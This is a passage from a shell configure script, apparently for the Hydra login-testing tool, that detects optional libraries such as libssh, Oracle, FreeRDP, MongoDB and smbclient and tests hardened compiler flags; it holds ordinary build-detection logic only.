$i/libssh.so* 2> /dev/null | grep libssh.`\n if [ -n \"$TMP_LIB\" ]; then\n SSH_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SSH_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libssh.dll* 2> /dev/null | grep libssh.`\n if [ -n \"$TMP_LIB\" ]; then\n SSH_PATH=\"$i\"\n fi\n fi\ndone\nfor i in $INCDIRS ; do\n if [ \"X\" = \"X$SSH_IPATH\" ]; then\n if [ -f \"$i/libssh/libssh.h\" ]; then\n SSH_IPATH=\"$i\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: SSH_PATH=$SSH_PATH/libssh\n echo DEBUG: SSH_IPATH=$SSH_IPATH/libssh/libssh.h\nfi\nif [ \"X\" = \"X$SSH_PATH\" ]; then\n SSH_IPATH=\"\"\nfi\nif [ \"X\" = \"X$SSH_IPATH\" ]; then\n SSH_PATH=\"\"\nfi\nif [ -n \"$SSH_PATH\" ]; then\n echo \" ... found\"\nfi\nif [ \"X\" = \"X$SSH_PATH\" ]; then\n echo \" ... NOT found, module ssh disabled\"\n echo 'Get it from http://www.libssh.org'\nfi\nif [ \"$SSH_IPATH\" = \"/usr/include\" ]; then\n SSH_IPATH=\"\"\nfi\n\necho \"Checking for Oracle (libocci/libclntsh/oci.h/libaio/liboci) ...\"\n#assume if we find oci.h other headers should also be in that dir\n#for libs we will test the 2\nif [ \"X\" != \"X$WORACLE_PATH\" ]; then\n INCDIRS=\"$INCDIRS $WORACLE_PATH\"\nfi\nif [ \"X\" != \"X$WORACLE_LIB_PATH\" ]; then\n LIBDIRS=\"$LIBDIRS $WORACLE_LIB_PATH\"\nfi\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: ORACLE_LIB=$LIBDIRS\n echo DEBUG: ORACLE_INC=$INCDIRS\nfi\n\nfor i in $LIBDIRS ; do\n if [ \"X\" = \"X$ORACLE_PATH\" ]; then\n if [ -f \"$i/libocci.so\" -a -f \"$i/libclntsh.so\" ]; then\n ORACLE_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$ORACLE_PATH\" ]; then\n if [ -f \"$i/libocci.dylib\" -a -f \"$i/libclntsh.dylib\" ]; then\n ORACLE_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$ORACLE_PATH\" ]; then\n if [ -f \"$i/libocci.a\" -a -f \"$i/libclntsh.a\" ]; then\n ORACLE_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$ORACLE_PATH\" ]; then\n if [ -f \"$i/liboci.a\" -a -f \"$i/oci.dll\" ]; then\n ORACLE_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$ORACLE_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libocci.so.* 2> /dev/null | grep occi.`\n if [ -n \"$TMP_LIB\" ]; then\n ORACLE_PATH=\"$i\"\n fi\n if [ \"X\" != \"X$ORACLE_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libclntsh.so.* 2> /dev/null | grep clntsh.`\n if [ -z \"$TMP_LIB\" ]; then\n ORACLE_PATH=\"\"\n fi\n fi\n fi\n if [ \"X\" = \"X$ORACLE_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/oci.dll* 2> /dev/null | grep occi.`\n if [ -n \"$TMP_LIB\" ]; then\n ORACLE_PATH=\"$i\"\n fi\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: ORACLE_PATH=$ORACLE_PATH/libocci\nfi\n#check for Kernel Asynchronous I/O (AIO) lib support, no need on Cygwin\nif [ \"X\" != \"X$ORACLE_PATH\" -a \"$SYSO\" != \"Cygwin\" ]; then\n LIBAIO=\"\"\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$LIBAIO\" ]; then\n if [ -f \"$i/libaio.so\" -o -f \"$i/libaio.dylib\" -o -f \"$i/libaio.a\" ]; then\n LIBAIO=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$LIBAIO\" ]; then\n TMP_LIB=`/bin/ls $i/libaio.so.* 2> /dev/null | grep aio.`\n if [ -n \"$TMP_LIB\" ]; then\n LIBAIO=\"$i\"\n fi\n TMP_LIB=`/bin/ls $i/libaio.dll* 2> /dev/null | grep aio.`\n if [ -n \"$TMP_LIB\" ]; then\n LIBAIO=\"$i\"\n fi\n fi\n done\n if [ \"X\" = \"X$LIBAIO\" ]; then\n ORACLE_PATH=\"\"\n fi\nfi\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: ORACLE_PATH=$ORACLE_PATH/libaio\nfi\n\nfor i in $INCDIRS ; do\n if [ -f \"$i/oci.h\" ]; then\n ORACLE_IPATH=\"$i\"\n fi\ndone\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: ORACLE_IPATH=$ORACLE_IPATH/oci.h\nfi\nif [ -n \"$ORACLE_PATH\" -a -n \"$ORACLE_IPATH\" ]; then\n echo \" ... found\"\nfi\nif [ \"X\" = \"X$ORACLE_PATH\" -o \"X\" = \"X$ORACLE_IPATH\" ]; then\n echo \" ... NOT found, module Oracle disabled\"\n echo \"Get basic and sdk package from https://www.oracle.com/database/technologies/instant-client/downloads.html\"\n ORACLE_PATH=\"\"\n ORACLE_IPATH=\"\"\nfi\n\necho \"Checking for Memcached (libmemcached/memcached.h) ...\"\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$MCACHED_PATH\" ]; then\n if [ -f \"$i/libmemcached.so\" -o -f \"$i/libmemcached.dylib\" -o -f \"$i/libmemcached.a\" ]; then\n MCACHED_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$MCACHED_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libmemcached.so* 2> /dev/null | grep memcached`\n if [ -n \"$TMP_LIB\" ]; then\n MCACHED_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$MCACHED_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libmemcached.dll* 2> /dev/null | grep memcached`\n if [ -n \"$TMP_LIB\" ]; then\n MCACHED_PATH=\"$i\"\n fi\n fi\n done\n\n MCACHED_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$MCACHED_IPATH\" ]; then\n if [ -f \"$i/memcached.h\" ]; then\n MCACHED_IPATH=\"$i\"\n elif [ -f \"$i/libmemcached/memcached.h\" ]; then\n MCACHED_IPATH=\"$i/libmemcached\"\n elif [ -f \"$i/libmemcached-1.0/memcached.h\" ]; then\n MCACHED_IPATH=\"$i/libmemcached-1.0\"\n fi\n fi\n done\n\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: MCACHED_PATH=$MCACHED_PATH/libmemcached\n echo DEBUG: MCACHED_IPATH=$MCACHED_IPATH/memcached.h\nfi\n if [ -n \"$MCACHED_PATH\" -a -n \"$MCACHED_IPATH\" ]; then\n echo \" ... found\"\n fi\n if [ \"X\" = \"X$MCACHED_PATH\" -o \"X\" = \"X$MCACHED_IPATH\" ]; then\n echo \" ... NOT found, module memcached disabled\"\n MCACHED_PATH=\"\"\n MCACHED_IPATH=\"\"\n fi\n\necho \"Checking for Freerdp3 (libfreerdp3/freerdp.h/libwinpr3/winpr.h) ...\"\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$FREERDP3_PATH\" ]; then\n if [ -f \"$i/libfreerdp3.so\" -o -f \"$i/libfreerdp3.dylib\" -o -f \"$i/libfreerdp3.a\" -o -f \"$i/libfreerdp3.dll.a\" ]; then\n FREERDP3_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$FREERDP3_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libfreerdp3*.so* 2> /dev/null | grep libfreerdp3`\n if [ -n \"$TMP_LIB\" ]; then\n FREERDP3_PATH=\"$i\"\n fi\n fi\n done\n\n FREERDP3_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$FREERDP3_IPATH\" ]; then\n if [ -f \"$i/freerdp/freerdp.h\" ]; then\n FREERDP3_IPATH=\"$i/freerdp3\"\n fi\n if [ -f \"$i/freerdp3/freerdp/freerdp.h\" ]; then\n FREERDP3_IPATH=\"$i/freerdp3\"\n fi\n fi\n done\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$WINPR3_PATH\" ]; then\n if [ -f \"$i/libwinpr3.so\" -o -f \"$i/libwinpr3.dylib\" -o -f \"$i/libwinpr3.a\" ]; then\n WINPR3_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$WINPR3_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libwinpr3.dll.a 2> /dev/null | grep winpr`\n if [ -n \"$TMP_LIB\" ]; then\n WINPR3_PATH=\"$i\"\n fi\n fi\n done\n\n WINPR3_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$WINPR3_IPATH\" ]; then\n if [ -f \"$i/winpr.h\" ]; then\n WINPR3_IPATH=\"$i\"\n fi\n if [ -f \"$i/winpr3/winpr/winpr.h\" ]; then\n WINPR3_IPATH=\"$i/winpr3\"\n fi\n fi\n done\n\n if [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: FREERDP3_PATH=$FREERDP3_PATH/\n echo DEBUG: FREERDP3_IPATH=$FREERDP3_IPATH/\n echo DEBUG: WINPR3_PATH=$WINPR3_PATH/\n echo DEBUG: WINPR3_IPATH=$WINPR3_IPATH/\n fi\n\n if [ -n \"$FREERDP3_PATH\" -a -n \"$FREERDP3_IPATH\" -a -n \"$WINPR3_PATH\" -a -n \"$WINPR3_IPATH\" ]; then\n echo \" ... found\"\n fi\n if [ \"X\" = \"X$FREERDP3_PATH\" -o \"X\" = \"X$FREERDP3_IPATH\" -o \"X\" = \"X$WINPR3_PATH\" -o \"X\" = \"X$WINPR3_IPATH\" ]; then\n echo \" ... NOT found, checking for freerdp2 module next...\"\n FREERDP3_PATH=\"\"\n FREERDP3_IPATH=\"\"\n WINPR3_PATH=\"\"\n WINPR3_IPATH=\"\"\n fi\n\n if [ \"X\" = \"X$FREERDP3_PATH\" -o \"X\" = \"X$FREERDP3_IPATH\" -o \"X\" = \"X$WINPR3_PATH\" -o \"X\" = \"X$WINPR3_IPATH\" ]; then\n echo \"Checking for Freerdp2 (libfreerdp2/freerdp.h/libwinpr2/winpr.h) ...\"\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$FREERDP2_PATH\" ]; then\n if [ -f \"$i/libfreerdp2.so\" -o -f \"$i/libfreerdp2.dylib\" -o -f \"$i/libfreerdp2.a\" -o -f \"$i/libfreerdp2.dll.a\" ]; then\n FREERDP2_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$FREERDP2_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libfreerdp2*.so* 2> /dev/null | grep libfreerdp2`\n if [ -n \"$TMP_LIB\" ]; then\n FREERDP2_PATH=\"$i\"\n fi\n fi\n done\n\n FREERDP2_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$FREERDP2_IPATH\" ]; then\n if [ -f \"$i/freerdp/freerdp.h\" ]; then\n FREERDP2_IPATH=\"$i/freerdp2\"\n fi\n if [ -f \"$i/freerdp2/freerdp/freerdp.h\" ]; then\n FREERDP2_IPATH=\"$i/freerdp2\"\n fi\n fi\n done\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$WINPR2_PATH\" ]; then\n if [ -f \"$i/libwinpr2.so\" -o -f \"$i/libwinpr2.dylib\" -o -f \"$i/libwinpr2.a\" ]; then\n WINPR2_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$WINPR2_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libwinpr2.dll.a 2> /dev/null | grep winpr`\n if [ -n \"$TMP_LIB\" ]; then\n WINPR2_PATH=\"$i\"\n fi\n fi\n done\n\n WINPR2_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$WINPR2_IPATH\" ]; then\n if [ -f \"$i/winpr.h\" ]; then\n WINPR2_IPATH=\"$i\"\n fi\n if [ -f \"$i/winpr2/winpr/winpr.h\" ]; then\n WINPR2_IPATH=\"$i/winpr2\"\n fi\n fi\n done\n\n if [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: FREERDP2_PATH=$FREERDP2_PATH/\n echo DEBUG: FREERDP2_IPATH=$FREERDP2_IPATH/\n echo DEBUG: WINPR2_PATH=$WINPR2_PATH/\n echo DEBUG: WINPR2_IPATH=$WINPR2_IPATH/\n fi\n\n if [ -n \"$FREERDP2_PATH\" -a -n \"$FREERDP2_IPATH\" -a -n \"$WINPR2_PATH\" -a -n \"$WINPR2_IPATH\" ]; then\n echo \" ... found\"\n fi\n if [ \"X\" = \"X$FREERDP2_PATH\" -o \"X\" = \"X$FREERDP2_IPATH\" -o \"X\" = \"X$WINPR2_PATH\" -o \"X\" = \"X$WINPR2_IPATH\" ]; then\n echo \" ... NOT found, module rdp disabled\"\n FREERDP2_PATH=\"\"\n FREERDP2_IPATH=\"\"\n WINPR2_PATH=\"\"\n WINPR2_IPATH=\"\"\n fi\nfi\n\necho \"Checking for Mongodb2 (mongoc-2.x.x/mongoc/mongoc.h/bson-2.x.x/bson/bson.h) ...\"\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$MONGODB2_PATH\" ]; then\n if [ -f \"$i/libmongoc2.so\" -o -f \"$i/libmongoc2.dylib\" -o -f \"$i/libmongoc2.a\" ]; then\n MONGODB2_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$MONGODB2_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libmongoc2.so* 2> /dev/null | grep mongoc`\n if [ -n \"$TMP_LIB\" ]; then\n MONGODB2_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$MONGODB2_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libmongoc2.dll* 2> /dev/null | grep mongoc`\n if [ -n \"$TMP_LIB\" ]; then\n MONGODB2_PATH=\"$i\"\n fi\n fi\n done\n\n MONGODB2_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$MONGODB2_IPATH\" ]; then\n if [ -f \"$i/mongoc.h\" ]; then\n MONGODB2_IPATH=\"$i\"\n fi\n if [ -f \"$i/mongoc/mongoc.h\" ]; then\n MONGODB2_IPATH=\"$i/libmongoc\"\n fi\n for ii in `ls -1d $i/mongoc-2.*`; do\n if [ -f \"${ii}/mongoc/mongoc.h\" ]; then\n MONGODB2_IPATH=\"$ii\"\n fi\n done\n fi\n done\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$BSON2_PATH\" ]; then\n if [ -f \"$i/libbson2.so\" -o -f \"$i/libbson2.dylib\" -o -f \"$i/libbson2.a\" ]; then\n BSON2_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$BSON2_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libbson2*.so* 2> /dev/null | grep mongoc`\n if [ -n \"$TMP_LIB\" ]; then\n BSON2_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$BSON2_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libbson2.dll* 2> /dev/null | grep mongoc`\n if [ -n \"$TMP_LIB\" ]; then\n BSON2_PATH=\"$i\"\n fi\n fi\n done\n\n BSON2_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$BSON2_IPATH\" ]; then\n if [ -f \"$i/bson.h\" ]; then\n BSON2_IPATH=\"$i\"\n fi\n if [ -f \"$i/libbson/bson.h\" ]; then\n BSON2_IPATH=\"$i/libbson\"\n fi\n for ii in `ls -1d $i/bson-2.*`; do\n if [ -f \"${ii}/bson/bson.h\" ]; then\n BSON2_IPATH=\"$ii\"\n fi\n done\n fi\n done\n\nif [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: MONGODB2_PATH=$MONGODB2_PATH\n echo DEBUG: MONGODB2_IPATH=$MONGODB2_IPATH\n echo DEBUG: BSON2_PATH=$BSON2_PATH\n echo DEBUG: BSON2_IPATH=$BSON2_IPATH\nfi\n\n if [ -n \"$MONGODB2_PATH\" -a -n \"$MONGODB2_IPATH\" -a -n \"$BSON2_PATH\" -a -n \"$BSON2_IPATH\" ]; then\n echo \" ... found\"\n fi\n if [ \"X\" = \"X$MONGODB2_PATH\" -o \"X\" = \"X$MONGODB2_IPATH\" -o \"X\" = \"X$BSON2_PATH\" -o \"X\" = \"X$BSON2_IPATH\" ]; then\n echo \" ... NOT found, module mongodb2 disabled\"\n MONGODB2_PATH=\"\"\n MONGODB2_IPATH=\"\"\n BSON2_PATH=\"\"\n BSON2_IPATH=\"\"\n fi\n\nif [ \"X\" = \"X$MONGODB2_PATH\" -o \"X\" = \"X$MONGODB2_IPATH\" -o \"X\" = \"X$BSON2_PATH\" -o \"X\" = \"X$BSON2_IPATH\" ]; then\n echo \"Checking for Mongodb (libmongoc-1.0/mongoc.h/libbson-1.0/bson.h) ...\"\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$MONGODB_PATH\" ]; then\n if [ -f \"$i/libmongoc-1.0.so\" -o -f \"$i/libmongoc-1.0.dylib\" -o -f \"$i/libmongoc-1.0.a\" ]; then\n MONGODB_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$MONGODB_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libmongoc-*.so* 2> /dev/null | grep mongoc`\n if [ -n \"$TMP_LIB\" ]; then\n MONGODB_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$MONGODB_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libmongoc.dll* 2> /dev/null | grep mongoc`\n if [ -n \"$TMP_LIB\" ]; then\n MONGODB_PATH=\"$i\"\n fi\n fi\n done\n\n MONGODB_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$MONGODB_IPATH\" ]; then\n if [ -f \"$i/mongoc.h\" ]; then\n MONGODB_IPATH=\"$i\"\n fi\n if [ -f \"$i/libmongoc/mongoc.h\" ]; then\n MONGODB_IPATH=\"$i/libmongoc\"\n fi\n if [ -f \"$i/libmongoc-1.0/mongoc.h\" ]; then\n MONGODB_IPATH=\"$i/libmongoc-1.0\"\n fi\n fi\n done\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$BSON_PATH\" ]; then\n if [ -f \"$i/libbson-1.0.so\" -o -f \"$i/libbson-1.0.dylib\" -o -f \"$i/libbson-1.0.a\" ]; then\n BSON_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$BSON_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libbson-*.so* 2> /dev/null | grep mongoc`\n if [ -n \"$TMP_LIB\" ]; then\n BSON_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$BSON_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libbson.dll* 2> /dev/null | grep mongoc`\n if [ -n \"$TMP_LIB\" ]; then\n BSON_PATH=\"$i\"\n fi\n fi\n done\n\n BSON_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$BSON_IPATH\" ]; then\n if [ -f \"$i/bson.h\" ]; then\n BSON_IPATH=\"$i\"\n fi\n if [ -f \"$i/libbson/bson.h\" ]; then\n BSON_IPATH=\"$i/libbson\"\n fi\n if [ -f \"$i/libbson-1.0/bson.h\" ]; then\n BSON_IPATH=\"$i/libbson-1.0\"\n fi\n fi\n done\n\n if [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: MONGODB_PATH=$MONGODB_PATH/libmongoc\n echo DEBUG: MONGODB_IPATH=$MONGODB_IPATH/libmongoc.h\n echo DEBUG: BSON_PATH=$BSON_PATH/libbson\n echo DEBUG: BSON_IPATH=$BSON_IPATH/libbson.h\n fi\n\n if [ -n \"$MONGODB_PATH\" -a -n \"$MONGODB_IPATH\" -a -n \"$BSON_PATH\" -a -n \"$BSON_IPATH\" ]; then\n echo \" ... found\"\n fi\n if [ \"X\" = \"X$MONGODB_PATH\" -o \"X\" = \"X$MONGODB_IPATH\" -o \"X\" = \"X$BSON_PATH\" -o \"X\" = \"X$BSON_IPATH\" ]; then\n echo \" ... NOT found, module mongodb disabled\"\n MONGODB_PATH=\"\"\n MONGODB_IPATH=\"\"\n BSON_PATH=\"\"\n BSON_IPATH=\"\"\n fi\nfi\n\necho \"Checking for smbclient (libsmbclient/libsmbclient.h) ...\"\n\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$SMBC_PATH\" ]; then\n if [ -f \"$i/libsmbclient.so\" -o -f \"$i/libsmbclient.dylib\" -o -f \"$i/libsmbclient.a\" ]; then\n SMBC_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SMBC_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libsmbclient.so* 2> /dev/null | grep smbclient`\n if [ -n \"$TMP_LIB\" ]; then\n SMBC_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SMBC_PATH\" ]; then\n TMP_LIB=`/bin/ls $i/libsmbclient.dll* 2> /dev/null | grep smbclient`\n if [ -n \"$TMP_LIB\" ]; then\n SMBC_PATH=\"$i\"\n fi\n fi\n done\n\n SMBC_IPATH=\n for i in $INCDIRS ; do\n if [ \"X\" = \"X$SMBC_IPATH\" ]; then\n if [ -f \"$i/libsmbclient.h\" ]; then\n SMBC_IPATH=\"$i\"\n fi\n if [ -f \"$i/samba-4.0/libsmbclient.h\" ]; then\n SMBC_IPATH=\"$i/samba-4.0\"\n fi\n fi\n done\n\n if [ \"X\" != \"X$DEBUG\" ]; then\n echo DEBUG: SMBC_PATH=$SMBC_PATH/libsmbclient\n echo DEBUG: SMBC_IPATH=$SMBC_IPATH/libsmbclient.h\n fi\n if [ -n \"$SMBC_PATH\" -a -n \"$SMBC_IPATH\" ]; then\n echo \" ... found\"\n fi\n if [ \"X\" = \"X$SMBC_PATH\" -o \"X\" = \"X$SMBC_IPATH\" ]; then\n echo \" ... NOT found, module smb2 disabled\"\n SMBC_PATH=\"\"\n SMBC_IPATH=\"\"\n fi\n\n\nif [ \"X\" = \"X$XHYDRA_SUPPORT\" ]; then\n echo \"Checking for GUI req's (pkg-config/gtk+-3.0) ...\"\n XHYDRA_SUPPORT=`$PKG_CONFIG --help > /dev/null 2>&1 || echo disabled`\n if [ \"X\" = \"X$XHYDRA_SUPPORT\" ]; then\n XHYDRA_SUPPORT=`$PKG_CONFIG --modversion gtk+-3.0 2> /dev/null`\n else\n XHYDRA_SUPPORT=\"\"\n fi\n if [ \"X\" = \"X$XHYDRA_SUPPORT\" ]; then\n echo \" ... NOT found, optional anyway\"\n else\n echo \" ... found\"\n fi\nfi\n\nif [ \"$SYSS\" = \"SunOS\" ]; then\n echo \"Checking for Solaris libraries ...\"\n for i in $LIBDIRS ; do\n if [ \"X\" = \"X$NSL_PATH\" ]; then\n if [ -f \"$i/libnsl.so\" ]; then\n NSL_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$SOCKET_PATH\" ]; then\n if [ -f \"$i/libsocket.so\" ]; then\n SOCKET_PATH=\"$i\"\n fi\n fi\n if [ \"X\" = \"X$RESOLV_PATH\" ]; then\n if [ -f \"$i/libresolv.so\" ]; then\n RESOLV_PATH=\"$i\"\n fi\n fi\n done\n if [ \"X\" = \"X$NSL_PATH\" ]; then\n echo \"NSL library not found, which is needed on Solaris.\"\n fi\n if [ \"X\" = \"X$SOCKET_PATH\" ]; then\n echo \"Socket library not found, which is needed on Solaris.\"\n fi\n if [ \"X\" = \"X$RESOLV_PATH\" ]; then\n echo \"Resolv library not found, which is needed on Solaris.\"\n fi\n if [ -n \"$RESOLV_PATH\" -a -n \"$SOCKET_PATH\" -a -n \"$RESOLV_PATH\" ]; then\n echo \" ... all found\"\n fi\n echo\nfi\n\necho \"Checking for Android specialities ...\"\nTMPC=comptest$$\nSTRRCHR=\" not\"\necho '#include ' > $TMPC.c\necho '#include ' >> $TMPC.c\necho \"int main() { char *x = strrchr(\\\"test\\\", 'e'); if (x == NULL) return 0; else return 1; }\" >> $TMPC.c\n$CC -o $TMPC $TMPC.c > /dev/null 2>&1\ntest -x $TMPC && STRRCHR=\"\"\nrm -f $TMPC\n$CC -o $TMPC -Wl,--allow-multiple-definition $TMPC.c > /dev/null 2>&1\nWALLOW=\"no\"\ntest -x $TMPC && WALLOW=\"yes\"\nrm -f $TMPC $TMPC.c\necho \" ... strrchr()$STRRCHR found\"\nif [ -n \"$CRYPTO_PATH\" ]; then\n RSA=\" not\"\n echo '#include ' > $TMPC.c\n echo '#include ' >> $TMPC.c\n echo \"int main() { RSA *rsa = RSA_generate_key(1024, RSA_F4, NULL, NULL); if (rsa == NULL) return 0; else return 1; }\" >> $TMPC.c\n#echo \"int main() { RSA *rsa; RSA_generate_key_ex(rsa, 1024, 0, NULL); if (rsa == NULL) return 0; else return 1; }\" >> $TMPC.c\n $CC -o $TMPC $TMPC.c -lssl -lcrypto > /dev/null 2>&1\n test -x $TMPC && RSA=\"\"\n rm -f $TMPC $TMPC.c\n echo \" ... RSA_generate_key()$RSA found\"\nfi\n\necho \"Checking for secure compile option support in $CC ...\"\nGCCSEC=\"no\"\nLDSEC=\"no\"\nGCCSECOPT=\"-fstack-protector-all --param ssp-buffer-size=4 -D_FORTIFY_SOURCE=2\"\nLDSECOPT=\"\"\necho '#include ' > $TMPC.c\necho 'int main() { printf(\"\"); return 0; }' >> $TMPC.c\n$CC -pie -fPIE $GCCSEPOPT -o $TMPC $TMPC.c > /dev/null 2> $TMPC.c.err\ntest -x $TMPC && GCCSEC=\"yes\"\ngrep -q fPI $TMPC.c.err || {\n GCCSEC=yes\n GCCSECOPT=\"-fPIE $GCCSECOPT\"\n LDSEC=yes\n LDSECOPT=\"$LDSECOPT -pie\"\n}\nrm -f \"$TMPC\"\n$CC $GCCSECOPT $LDSECOPT -Wl,-z,now -Wl,-z,relro -o $TMPC $TMPC.c > /dev/null 2> $TMPC.c.err\ntest -x $TMPC && { LDSEC=yes; LDSECOPT=\"$LDSECOPT -Wl,-z,now -Wl,-z,relro\" ; }\nrm -f $TMPC $TMPC.c $TMPC.c.err\necho \" Compiling... $GCCSEC\"\necho \" Linking... $LDSEC\"\n\necho \"Checking for --allow-multiple-definition linker option ... $WALLOW\"\nif [ \"$WALLOW\" = \"yes\" ]; then\n LDSEC=yes\n LDSECOPT=\"$LDSECOPT -Wl,--allow-multiple-definition\"\nfi\n\necho\nXDEFINES=\"\"\nXLIBS=\"\"\nXLIBPATHS=\"\"\nXIPATHS=\"\"\n\nif [ -n \"$FIREBIRD_PATH\" -o \\\n -n \"$PCRE_PATH\" -o \\\n -n \"$IDN_PATH\" -o \\\n -n \"$SSL_PATH\" -o \\\n -n \"$CRYPTO_PATH\" -o \\\n -n \"$NSL_PATH\" -o \\\n -n \"$SOCKET_PATH\" -o \\\n -n \"$RESOLV_PATH\" -o \\\n -n \"$SAPR3_PATH\" -o \\\n -n \"$SSH_PATH\" -o \\\n -n \"$POSTGRES_PATH\" -o \\\n -n \"$SVN_PATH\" -o \\\n -n \"$NCP_PATH\" -o \\\n -n \"$CURSES_PATH\" -o \\\n -n \"$ORACLE_PATH\" -o \\\n -n \"$AFP_PATH\" -o \\\n -n \"$MYSQL_PATH\" -o \\\n -n \"$MCACHED_PATH\" -o \\\n -n \"$MONGOD_PATH\" -o \\\n -n \"$FREERDP2_PATH\" -o \\\n -n \"$WINPR2_PATH\" -o \\\n -n \"$FREERDP3_PATH\" -o \\\n -n \"$WINPR3_PATH\" -o \\\n -n \"$SMBC_PATH\" \\\n ]; then\n if [ \"$SYSS\" = \"Darwin\" -a ! -d \"/lib\" ]; then\n #for libraries installed with MacPorts\n if [ -d \"/opt/local/lib\" ]; then\n XLIBPATHS=\"-L/usr/lib -L/usr/local/lib -L/opt/local/lib\"\n else\n XLIBPATHS=\"-L/usr/lib -L/usr/local/lib\"\n fi\n else\n XLIBPATHS=\"-L/usr/lib -L/usr/local/lib -L/lib\"\n fi\nfi\nif [ -n \"$MYSQL_IPATH\" ]; then\n XIPATHS=\"$XIPATHS -I$MYSQL_IPATH\"\n if [ -n \"$MYSQLINSUBDIR\" ]; then\n XDEFINES=\"$XDEFINES -DHAVE_MYSQL_MYSQL_H\"\n else\n XDEFINES=\"$XDEFINES -DHAVE_MYSQL_H\"\n fi\nfi\nif [ -n \"$SSL_PATH\" ]; then\n if [ -n \"$SSLNEW\" ]; then\n XDEFINES=\"$XDEFINES -DLIBOPENSSL\"\n fi\nfi\nif [ -n \"$CURSES_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBNCURSES\"\nfi\nif [ -n \"$SAPR3_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBSAPR3\"\nfi\nif [ -n \"$FIREBIRD_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBFIREBIRD\"\nfi\nif [ -n \"$IDN_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBIDN -DHAVE_PR29_H\"\nfi\nif [ -n \"$PCRE_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DHAVE_PCRE\"\nfi\nif [ -n \"$MYSQL_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBMYSQLCLIENT\"\nfi\nif [ -n \"$AFP_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBAFP\"\nfi\nif [ -n \"$NCP_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBNCP\"\nfi\nif [ -n \"$ORACLE_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBORACLE\"\nfi\nif [ -n \"$POSTGRES_PATH\" ]; then\n XDEFINES=\"$XDEFINES -DLIBPOSTGRES\"\nfi\nif [ -n \"$SVN_PATH\" 